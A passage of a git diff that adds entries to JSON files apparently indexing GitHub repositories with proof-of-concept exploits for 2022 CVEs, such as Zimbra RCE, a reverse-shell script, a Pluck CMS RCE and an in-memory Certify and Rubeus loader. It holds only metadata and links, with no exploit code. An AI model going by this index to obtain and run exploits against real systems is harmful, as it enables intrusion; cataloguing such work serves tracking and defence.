"watchers": 38, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26766.json b/2022/CVE-2022-26766.json new file mode 100644 index 0000000000..c4dcad4fb7 --- /dev/null +++ b/2022/CVE-2022-26766.json @@ -0,0 +1,33 @@ +[ + { + "id": 509675427, + "name": "CoreTrustDemo", + "full_name": "zhuowei\/CoreTrustDemo", + "owner": { + "login": "zhuowei", + "id": 704768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/704768?v=4", + "html_url": "https:\/\/github.com\/zhuowei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhuowei\/CoreTrustDemo", + "description": "Proof-of-concept for CVE-2022-26766 on macOS 12.3.1", + "fork": false, + "created_at": "2022-07-02T06:16:33Z", + "updated_at": "2024-08-26T16:04:07Z", + "pushed_at": "2022-07-02T17:14:41Z", + "stargazers_count": 84, + "watchers_count": 84, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 84, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26809.json b/2022/CVE-2022-26809.json index 8b5baabac0..c296ec75ea 100644 --- a/2022/CVE-2022-26809.json +++ b/2022/CVE-2022-26809.json @@ -250,5 +250,67 @@ "watchers": 108, "score": 0, "subscribers_count": 5 + }, + { + "id": 518520520, + "name": "FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp", + "full_name": "fuckjsonp\/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp", + "owner": { + "login": "fuckjsonp", + "id": 110118141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110118141?v=4", + "html_url": "https:\/\/github.com\/fuckjsonp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuckjsonp\/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp", + "description": "警惕 一种针对红队的新型溯源手段!", + "fork": false, + "created_at": "2022-07-27T15:48:19Z", + "updated_at": "2025-01-03T19:17:19Z", + "pushed_at": "2022-07-27T15:55:01Z", + "stargazers_count": 395, + "watchers_count": 395, + "has_discussions": false, + "forks_count": 82, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 82, + "watchers": 395, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 582285658, + "name": "Cve-2022-26809", + "full_name": "michealadams30\/Cve-2022-26809", + "owner": { + "login": "michealadams30", + "id": 113975732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113975732?v=4", + "html_url": "https:\/\/github.com\/michealadams30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michealadams30\/Cve-2022-26809", + "description": null, + "fork": false, + "created_at": "2022-12-26T10:36:29Z", + "updated_at": "2022-12-26T10:37:06Z", + "pushed_at": "2022-12-26T10:37:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-26923.json b/2022/CVE-2022-26923.json index 448a76bcd5..5c5b2c52fa 100644 --- a/2022/CVE-2022-26923.json +++ b/2022/CVE-2022-26923.json @@ -60,5 +60,129 @@ "watchers": 43, "score": 0, "subscribers_count": 4 + }, + { + "id": 525955636, + "name": "CVE-2022-26923-Powershell-POC", + "full_name": "lsecqt\/CVE-2022-26923-Powershell-POC", + "owner": { + "login": "lsecqt", + "id": 102690672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102690672?v=4", + "html_url": "https:\/\/github.com\/lsecqt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsecqt\/CVE-2022-26923-Powershell-POC", + "description": "A powershell poc to load and automatically run Certify and Rubeus from memory.", + "fork": false, + "created_at": "2022-08-17T21:13:49Z", + "updated_at": "2024-11-21T05:59:54Z", + "pushed_at": "2022-08-17T21:25:20Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706016211, + "name": "PIGADVulnScanner", + "full_name": "evilashz\/PIGADVulnScanner", + "owner": { + "login": "evilashz", + "id": 50722929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50722929?v=4", + "html_url": "https:\/\/github.com\/evilashz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evilashz\/PIGADVulnScanner", + "description": "检测域内常见一把梭漏洞,包括:NoPac、ZeroLogon、CVE-2022-26923、PrintNightMare", + "fork": false, + "created_at": "2023-10-17T06:29:44Z", + "updated_at": "2025-01-06T08:04:10Z", + "pushed_at": "2023-10-23T04:47:11Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 43, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 724703848, + "name": "CVE-2022-26923", + "full_name": "Gh-Badr\/CVE-2022-26923", + "owner": { + "login": "Gh-Badr", + "id": 110426701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110426701?v=4", + "html_url": "https:\/\/github.com\/Gh-Badr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gh-Badr\/CVE-2022-26923", + "description": "A proof of concept exploiting CVE-2022-26923.", + "fork": false, + "created_at": "2023-11-28T16:13:36Z", + "updated_at": "2023-12-06T21:25:52Z", + "pushed_at": "2023-12-09T23:39:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850747240, + "name": "CVE-2022-26923", + "full_name": "Yowise\/CVE-2022-26923", + "owner": { + "login": "Yowise", + "id": 42322439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42322439?v=4", + "html_url": "https:\/\/github.com\/Yowise", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yowise\/CVE-2022-26923", + "description": null, + "fork": false, + "created_at": "2024-09-01T17:03:27Z", + "updated_at": "2024-09-01T17:04:54Z", + "pushed_at": "2024-09-01T17:04:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-26937.json b/2022/CVE-2022-26937.json index c229e21fdc..8cf70c4c39 100644 --- a/2022/CVE-2022-26937.json +++ b/2022/CVE-2022-26937.json @@ -60,5 +60,44 @@ "watchers": 87, "score": 0, "subscribers_count": 4 + }, + { + "id": 547457138, + "name": "CVE-2022-26937", + "full_name": "Malwareman007\/CVE-2022-26937", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-26937", + "description": "POC Of CVE-2022-26937", + "fork": false, + "created_at": "2022-10-07T18:08:09Z", + "updated_at": "2023-05-06T12:14:59Z", + "pushed_at": "2022-10-07T18:10:22Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-26937", + "microsoft", + "network", + "poc", + "security", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 0, + "watchers": 14, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-26965.json b/2022/CVE-2022-26965.json new file mode 100644 index 0000000000..4ea55bdae6 --- /dev/null +++ b/2022/CVE-2022-26965.json @@ -0,0 +1,33 @@ +[ + { + "id": 674804496, + "name": "Pluck-Exploitation-by-skdevils", + "full_name": "SkDevilS\/Pluck-Exploitation-by-skdevils", + "owner": { + "login": "SkDevilS", + "id": 112902431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112902431?v=4", + "html_url": "https:\/\/github.com\/SkDevilS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SkDevilS\/Pluck-Exploitation-by-skdevils", + "description": "# Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated) # Date: 13.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https:\/\/github.com\/pluck-cms\/pluck # Version: 4.7.16 # Tested on Ubuntu 20.04.3 LTS # CVE: CVE-2022-26965 ", + "fork": false, + "created_at": "2023-08-04T20:32:08Z", + "updated_at": "2023-08-08T16:30:42Z", + "pushed_at": "2023-08-08T16:30:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27226.json b/2022/CVE-2022-27226.json new file mode 100644 index 0000000000..2caf8f0f72 --- /dev/null +++ b/2022/CVE-2022-27226.json @@ -0,0 +1,38 @@ +[ + { + "id": 470691866, + "name": "ez-iRZ", + "full_name": "SakuraSamuraii\/ez-iRZ", + "owner": { + "login": "SakuraSamuraii", + "id": 90020213, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90020213?v=4", + "html_url": "https:\/\/github.com\/SakuraSamuraii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SakuraSamuraii\/ez-iRZ", + "description": "Exploit for CVE-2022-27226", + "fork": false, + "created_at": "2022-03-16T17:45:12Z", + "updated_at": "2024-08-08T07:11:36Z", + "pushed_at": "2022-03-19T00:55:07Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-27226", + "cves", + "exploits", + "sakurasamuraii" + ], + "visibility": "public", + "forks": 6, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27251.json b/2022/CVE-2022-27251.json new file mode 100644 index 0000000000..791c794679 --- /dev/null +++ b/2022/CVE-2022-27251.json @@ -0,0 +1,33 @@ +[ + { + "id": 471809392, + "name": "CVE-2022-27251", + "full_name": "TheCyberGeek\/CVE-2022-27251", + "owner": { + "login": "TheCyberGeek", + "id": 52138157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52138157?v=4", + "html_url": "https:\/\/github.com\/TheCyberGeek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberGeek\/CVE-2022-27251", + "description": "Remote Code Execution in LocalStack 0.12.6", + "fork": false, + "created_at": "2022-03-19T20:49:56Z", + "updated_at": "2022-03-20T10:42:14Z", + "pushed_at": "2022-03-19T21:01:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27254.json b/2022/CVE-2022-27254.json new file mode 100644 index 0000000000..af12cc971d --- /dev/null +++ b/2022/CVE-2022-27254.json @@ -0,0 +1,33 @@ +[ + { + "id": 473238446, + "name": "CVE-2022-27254", + "full_name": "nonamecoder\/CVE-2022-27254", + "owner": { + "login": "nonamecoder", + "id": 5160055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5160055?v=4", + "html_url": "https:\/\/github.com\/nonamecoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nonamecoder\/CVE-2022-27254", + "description": "PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254)", + "fork": false, + "created_at": "2022-03-23T15:03:09Z", + "updated_at": "2025-01-04T05:44:42Z", + "pushed_at": "2022-03-26T05:52:15Z", + "stargazers_count": 453, + "watchers_count": 453, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 453, + "score": 0, + "subscribers_count": 21 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27255.json b/2022/CVE-2022-27255.json new file mode 100644 index 0000000000..c5a96058fa --- /dev/null +++ b/2022/CVE-2022-27255.json @@ -0,0 +1,70 @@ +[ + { + "id": 511232241, + "name": "cve-2022-27255", + "full_name": "infobyte\/cve-2022-27255", + "owner": { + "login": "infobyte", + "id": 4226354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4226354?v=4", + "html_url": "https:\/\/github.com\/infobyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infobyte\/cve-2022-27255", + "description": null, + "fork": false, + "created_at": "2022-07-06T17:29:04Z", + "updated_at": "2024-11-13T06:21:54Z", + "pushed_at": "2022-08-30T13:23:51Z", + "stargazers_count": 277, + "watchers_count": 277, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 277, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 529630669, + "name": "CVE-2022-27255-checker", + "full_name": "stryker-project\/CVE-2022-27255-checker", + "owner": { + "login": "stryker-project", + "id": 93190160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93190160?v=4", + "html_url": "https:\/\/github.com\/stryker-project", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stryker-project\/CVE-2022-27255-checker", + "description": "Simple checker for CVE-2022-27255 using poc_crash and telnet availability", + "fork": false, + "created_at": "2022-08-27T15:56:44Z", + "updated_at": "2024-11-12T02:23:20Z", + "pushed_at": "2022-08-29T09:44:36Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve", + "exploit", + "poc", + "python3" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27413.json b/2022/CVE-2022-27413.json new file mode 100644 index 0000000000..d9bf764df3 --- /dev/null +++ b/2022/CVE-2022-27413.json @@ -0,0 +1,33 @@ +[ + { + "id": 471061868, + "name": "CVE-2022-27413", + "full_name": "HH1F\/CVE-2022-27413", + "owner": { + "login": "HH1F", + "id": 101170679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101170679?v=4", + "html_url": "https:\/\/github.com\/HH1F", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HH1F\/CVE-2022-27413", + "description": null, + "fork": false, + "created_at": "2022-03-17T16:37:49Z", + "updated_at": "2022-11-09T16:15:07Z", + "pushed_at": "2022-03-18T14:39:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27414.json b/2022/CVE-2022-27414.json new file mode 100644 index 0000000000..5ff1243ac3 --- /dev/null +++ b/2022/CVE-2022-27414.json @@ -0,0 +1,33 @@ +[ + { + "id": 554482216, + "name": "CVE-2022-27414", + "full_name": "lus33rr\/CVE-2022-27414", + "owner": { + "login": "lus33rr", + "id": 84886384, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84886384?v=4", + "html_url": "https:\/\/github.com\/lus33rr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lus33rr\/CVE-2022-27414", + "description": "Exploit of College Website v1.0 CMS - SQL injection", + "fork": false, + "created_at": "2022-10-19T22:17:47Z", + "updated_at": "2024-08-12T20:27:54Z", + "pushed_at": "2022-10-20T02:01:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27499.json b/2022/CVE-2022-27499.json new file mode 100644 index 0000000000..0fc0d1fae4 --- /dev/null +++ b/2022/CVE-2022-27499.json @@ -0,0 +1,33 @@ +[ + { + "id": 692762993, + "name": "snapshot-demo", + "full_name": "web-logs2\/snapshot-demo", + "owner": { + "login": "web-logs2", + "id": 143675346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143675346?v=4", + "html_url": "https:\/\/github.com\/web-logs2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/web-logs2\/snapshot-demo", + "description": "CVE-2022-27499", + "fork": false, + "created_at": "2023-09-17T14:08:59Z", + "updated_at": "2023-09-17T14:08:59Z", + "pushed_at": "2023-01-16T14:30:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27502.json b/2022/CVE-2022-27502.json new file mode 100644 index 0000000000..a72bcd89ee --- /dev/null +++ b/2022/CVE-2022-27502.json @@ -0,0 +1,38 @@ +[ + { + "id": 553393223, + "name": "CVE-2022-27502", + "full_name": "alirezac0\/CVE-2022-27502", + "owner": { + "login": "alirezac0", + "id": 32331449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32331449?v=4", + "html_url": "https:\/\/github.com\/alirezac0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alirezac0\/CVE-2022-27502", + "description": "Exploit of RealVNC VNC Server", + "fork": false, + "created_at": "2022-10-18T06:31:21Z", + "updated_at": "2024-08-12T20:27:52Z", + "pushed_at": "2022-10-18T07:05:36Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-27502", + "dll-hijacking", + "privilege-escalation", + "windows" + ], + "visibility": "public", + "forks": 10, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27518.json b/2022/CVE-2022-27518.json new file mode 100644 index 0000000000..edb17648dc --- /dev/null +++ b/2022/CVE-2022-27518.json @@ -0,0 +1,33 @@ +[ + { + "id": 590162168, + "name": "CVE-2022-27518_POC", + "full_name": "dolby360\/CVE-2022-27518_POC", + "owner": { + "login": "dolby360", + "id": 22151399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22151399?v=4", + "html_url": "https:\/\/github.com\/dolby360", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dolby360\/CVE-2022-27518_POC", + "description": "A POC on how to exploit CVE-2022-27518 ", + "fork": false, + "created_at": "2023-01-17T19:40:04Z", + "updated_at": "2024-06-21T00:10:42Z", + "pushed_at": "2023-01-18T19:48:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27646.json b/2022/CVE-2022-27646.json new file mode 100644 index 0000000000..234228f556 --- /dev/null +++ b/2022/CVE-2022-27646.json @@ -0,0 +1,41 @@ +[ + { + "id": 648047567, + "name": "netgear_r6700v3_circled", + "full_name": "cyber-defence-campus\/netgear_r6700v3_circled", + "owner": { + "login": "cyber-defence-campus", + "id": 117660722, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117660722?v=4", + "html_url": "https:\/\/github.com\/cyber-defence-campus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyber-defence-campus\/netgear_r6700v3_circled", + "description": "Demonstrate some functionalities of Morion by generating an exploit for CVE-2022-27646 (stack buffer overflow on Netgear R6700v3 routers).", + "fork": false, + "created_at": "2023-06-01T05:10:56Z", + "updated_at": "2024-12-13T08:49:45Z", + "pushed_at": "2024-12-13T08:49:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "armv7", + "emulation", + "exploit-generation", + "gdb", + "morion", + "symbolic-execution", + "triton" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27666.json b/2022/CVE-2022-27666.json new file mode 100644 index 0000000000..0269cfb74a --- /dev/null +++ b/2022/CVE-2022-27666.json @@ -0,0 +1,64 @@ +[ + { + "id": 473383769, + "name": "CVE-2022-27666", + "full_name": "plummm\/CVE-2022-27666", + "owner": { + "login": "plummm", + "id": 15259042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15259042?v=4", + "html_url": "https:\/\/github.com\/plummm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plummm\/CVE-2022-27666", + "description": "Exploit for CVE-2022-27666", + "fork": false, + "created_at": "2022-03-23T22:54:28Z", + "updated_at": "2024-08-12T20:21:48Z", + "pushed_at": "2022-03-28T18:21:00Z", + "stargazers_count": 203, + "watchers_count": 203, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 39, + "watchers": 203, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 626171379, + "name": "cve-2022-27666-exploits", + "full_name": "Albocoder\/cve-2022-27666-exploits", + "owner": { + "login": "Albocoder", + "id": 11018611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11018611?v=4", + "html_url": "https:\/\/github.com\/Albocoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Albocoder\/cve-2022-27666-exploits", + "description": "There are 2 exploitation methods that exploit CVE-2022-27666. For more info on how to use these code bases please check my blog.", + "fork": false, + "created_at": "2023-04-11T00:12:33Z", + "updated_at": "2024-02-15T20:16:05Z", + "pushed_at": "2023-04-11T00:27:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27925.json b/2022/CVE-2022-27925.json new file mode 100644 index 0000000000..0230da524a --- /dev/null +++ b/2022/CVE-2022-27925.json @@ -0,0 +1,391 @@ +[ + { + "id": 524189931, + "name": "CVE-2022-27925-PoC", + "full_name": "vnhacker1337\/CVE-2022-27925-PoC", + "owner": { + "login": "vnhacker1337", + "id": 20364580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20364580?v=4", + "html_url": "https:\/\/github.com\/vnhacker1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vnhacker1337\/CVE-2022-27925-PoC", + "description": "Zimbra RCE simple poc", + "fork": false, + "created_at": "2022-08-12T18:35:52Z", + "updated_at": "2024-12-09T12:34:59Z", + "pushed_at": "2022-08-13T18:54:58Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 64, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 524792587, + "name": "CVE-2022-27925", + "full_name": "mohamedbenchikh\/CVE-2022-27925", + "owner": { + "login": "mohamedbenchikh", + "id": 58364955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58364955?v=4", + "html_url": "https:\/\/github.com\/mohamedbenchikh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mohamedbenchikh\/CVE-2022-27925", + "description": "Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-27925)", + "fork": false, + "created_at": "2022-08-14T22:22:55Z", + "updated_at": "2024-12-06T23:52:32Z", + "pushed_at": "2022-09-05T22:05:53Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-27925", + "exploit", + "zimbra", + "zimbra-exploit" + ], + "visibility": "public", + "forks": 19, + "watchers": 57, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 526466016, + "name": "CVE-2022-27925", + "full_name": "miko550\/CVE-2022-27925", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2022-27925", + "description": null, + "fork": false, + "created_at": "2022-08-19T04:46:08Z", + "updated_at": "2022-08-19T04:47:37Z", + "pushed_at": "2022-08-19T04:51:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 526901190, + "name": "CVE-2022-27925", + "full_name": "navokus\/CVE-2022-27925", + "owner": { + "login": "navokus", + "id": 2224563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2224563?v=4", + "html_url": "https:\/\/github.com\/navokus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/navokus\/CVE-2022-27925", + "description": null, + "fork": false, + "created_at": "2022-08-20T11:01:05Z", + "updated_at": "2022-08-20T11:01:58Z", + "pushed_at": "2022-08-20T11:01:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 526972804, + "name": "CVE-2022-27925", + "full_name": "Josexv1\/CVE-2022-27925", + "owner": { + "login": "Josexv1", + "id": 12077848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12077848?v=4", + "html_url": "https:\/\/github.com\/Josexv1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Josexv1\/CVE-2022-27925", + "description": "Zimbra CVE-2022-27925 PoC", + "fork": false, + "created_at": "2022-08-20T15:58:29Z", + "updated_at": "2024-11-06T11:11:13Z", + "pushed_at": "2022-08-27T20:30:21Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-27925", + "exploit", + "poc", + "zimbra" + ], + "visibility": "public", + "forks": 23, + "watchers": 42, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 529394141, + "name": "CVE-2022-27925-Revshell", + "full_name": "Chocapikk\/CVE-2022-27925-Revshell", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-27925-Revshell", + "description": "Python Script to exploit Zimbra Auth Bypass + RCE (CVE-2022-27925)", + "fork": false, + "created_at": "2022-08-26T20:19:48Z", + "updated_at": "2024-08-12T20:26:32Z", + "pushed_at": "2022-09-17T16:56:10Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 535575434, + "name": "CVE-2022-27925", + "full_name": "akincibor\/CVE-2022-27925", + "owner": { + "login": "akincibor", + "id": 99909324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99909324?v=4", + "html_url": "https:\/\/github.com\/akincibor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akincibor\/CVE-2022-27925", + "description": "CVE-2022-27925 nuclei template", + "fork": false, + "created_at": "2022-09-12T08:30:30Z", + "updated_at": "2022-09-16T16:47:12Z", + "pushed_at": "2022-09-12T08:31:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 537944043, + "name": "CVE-2022-27925-Revshell", + "full_name": "touchmycrazyredhat\/CVE-2022-27925-Revshell", + "owner": { + 